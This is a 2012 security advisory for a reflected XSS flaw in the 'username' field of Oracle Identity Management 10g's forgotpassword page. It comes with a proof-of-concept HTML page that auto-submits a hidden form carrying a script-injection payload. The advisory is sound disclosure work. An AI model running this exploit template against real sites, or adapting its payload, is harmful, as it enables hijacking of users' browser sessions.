<!-- Oracle Identity Management 10g (username) XSS POST Injection Vulnerability Vendor: Oracle Corporation Product web page: http://www.oracle.com Affected version: 10g (10.1.4.0.1) Summary: Oracle Identity Management enables organizations to effectively manage the end-to-end lifecycle of user identities across all enterprise resources, both within and beyond the firewall and into the cloud. The Oracle Identity Management platform delivers scalable solutions for identity governance, access management and directory services. This modern platform helps organizations strengthen security, simplify compliance and capture business opportunities around mobile and social access. Desc: Oracle Identity Management suffers from a reflected XSS POST Injection vulnerability when parsing user input to the 'username' parameter via POST method thru '/usermanagement/forgotpassword/index.jsp' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Oracle Application Server 10g httpd 10.1.2.2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5110 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php 25.09.2012 --> <html> <head> <title>Oracle Identity Management 10g (username) XSS POST Injection Vulnerability</title> </head> <body> <form name="XSS" method="POST" action="https://192.168.248.132/usermanagement/forgotpassword/index.jsp"> <input type="hidden" name="btnSubmit" value="SUBMIT" /> <input type="hidden" name="username" value='"><script>alert(1);</script>' /> </form> <script type="text/javascript"> document.XSS.submit(); </script> </body> </html>